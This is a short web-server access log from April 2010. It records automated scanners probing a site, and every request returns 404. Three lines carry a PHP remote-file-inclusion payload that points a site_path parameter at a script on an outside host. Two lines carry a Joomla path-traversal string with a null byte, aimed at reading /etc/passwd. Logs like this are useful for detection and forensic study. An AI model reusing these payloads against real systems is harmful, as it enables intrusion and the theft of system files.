174.121.24.1 - - [16/Apr/2010:00:47:41 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:47:42 -0400] "GET //include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:47:42 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.118.176.82 - - [16/Apr/2010:00:48:03 -0400] "GET /logs/access_log.Q109112600//index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
66.118.176.82 - - [16/Apr/2010:00:48:03 -0400] "GET //index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
